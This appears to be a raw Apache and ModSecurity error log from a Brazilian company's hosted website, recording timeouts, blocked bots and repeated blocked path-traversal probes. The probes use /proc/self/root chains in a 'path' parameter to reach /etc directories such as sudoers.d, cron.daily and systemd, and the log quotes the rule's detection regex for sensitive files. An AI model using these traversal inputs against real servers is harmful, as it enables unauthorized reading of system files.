[Tue Mar 17 22:26:39.561783 2026] [proxy_fcgi:error] [pid 25836:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36564] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:27:02.185795 2026] [proxy_fcgi:error] [pid 18211:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37430] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:27:06.423351 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:58014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_asdf6f5d65gmYZRv2wAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:27:27.674019 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38190] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:27:49.186058 2026] [proxy_fcgi:error] [pid 2598:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39038] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:28:11.161795 2026] [proxy_fcgi:error] [pid 17972:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39826] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:28:35.025788 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40686] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:28:38.554908 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.244.43:49444] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn_ximAPhZkrhU8w4kRgwAAAJQ"]
[Tue Mar 17 22:28:42.871381 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:42938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_yuyqAr6etmhZHNpXNgAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:28:57.548126 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41376] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:29:02.124112 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:57132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_3uw_le52K8_3pV19PAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:29:03.069285 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:58014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_38df6f5d65gmYZRwIAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:29:07.759083 2026] [:error] [pid 17972:tid 140411683178240] [client 74.7.241.31:40908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_44Z5-GlpYjVrXCrl9QAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:29:20.065824 2026] [proxy_fcgi:error] [pid 14206:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41998] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:29:21.963630 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.241.31:36224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn_8eyqAr6etmhZHNpXPAAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:29:25.300506 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.228.61:41174] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn_9Yh-PF_25v4hFRCb3QAAAQs"]
[Tue Mar 17 22:29:42.057988 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:42778] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:29:49.507090 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:41330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboADRj0p0SRWAqcjGGqlgAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:29:57.730617 2026] [mime_magic:error] [pid 17887:tid 140411641214720] (70014)End of file found: [client 74.7.243.128:35838] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/usr/lib/firmware/meson
[Tue Mar 17 22:30:04.157096 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43534] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:30:14.031003 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:42280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAJuoXxyEfFpUF8f8NWAAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:30:26.025904 2026] [proxy_fcgi:error] [pid 16560:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44276] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:30:48.062724 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45008] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:30:57.732181 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.243.128:54480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAUYh-PF_25v4hFRCcCAAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:10.069850 2026] [proxy_fcgi:error] [pid 14206:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45806] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:31:15.415568 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:50260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAY9Y0UrI5A3LftIwvagAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:17.244814 2026] [:error] [pid 18211:tid 140411699963648] [client 74.7.241.31:41030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAZRcIZFNFgEhGGCRHtwAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:33.165777 2026] [proxy_fcgi:error] [pid 2598:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:31:38.036471 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.241.31:50412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAegkwaGbbGflqUZC0VgAAANg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:43.392209 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.241.31:36388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAfxj0p0SRWAqcjGGqvQAAAww"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:44.716483 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:36390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAgNa6ubjKNq_cu4Y24AAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:47.673855 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:36396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAg9Y0UrI5A3LftIwvbQAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:53.201101 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:59168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAiRj0p0SRWAqcjGGqygAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:54.965093 2026] [:error] [pid 18211:tid 140411557287680] [client 74.7.241.31:59178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAihcIZFNFgEhGGCRHvAAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:31:55.137784 2026] [proxy_fcgi:error] [pid 16560:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47590] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:31:56.503461 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:59192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAjNa6ubjKNq_cu4Y24wAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:32:01.664131 2026] [:error] [pid 16560:tid 140411624429312] [client 74.7.243.128:54480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboAka6gUSg3B_dEMdIYAAAAAc4"], referer: 